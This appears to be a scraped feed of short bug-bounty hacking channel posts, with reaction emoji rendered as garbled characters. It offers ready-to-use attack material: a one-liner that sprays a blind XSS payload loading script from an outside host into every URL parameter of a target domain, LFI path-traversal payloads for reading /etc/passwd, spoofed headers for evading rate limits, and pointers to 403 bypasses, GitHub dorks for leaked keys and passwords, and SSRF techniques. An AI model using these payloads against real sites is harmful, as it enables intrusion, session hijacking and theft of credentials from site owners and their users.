๐Ÿ‘1
One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Testing Authentication Flaws in Web Application
๐Ÿ‘1
Some filter bypass payload list while hunting for LFi vulnerability


โ†’index.php?page=....//....//etc/passwd
โ†’index.php?page=..///////..////..//////etc/passwd
โ†’index.php?page=/var/www/../../etc/passwd
๐Ÿ‘3
Remote File Inclusion (RFI)
๐Ÿ‘5
Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
โคโ€๐Ÿ”ฅ8๐Ÿ‘1๐Ÿ‘Œ1๐Ÿณ1
403 bypass techniques
๐Ÿ‘5
Bypassing Rate Limit Protection
๐Ÿ‘5๐Ÿคฎ1
Github Dorks Cheatsheet

Find files with sensitive info, API Keys, Tokens and Passwords.

+ list of github dorks automation tools
๐Ÿ‘18๐Ÿ‘Œ4๐Ÿคฎ2
Chrome has just unleashed popovers: modal dialogs without JS! Of course you can abuse them for XSS filter evasion
SSRF Techniques Roadmap
๐Ÿ‘3๐Ÿ™2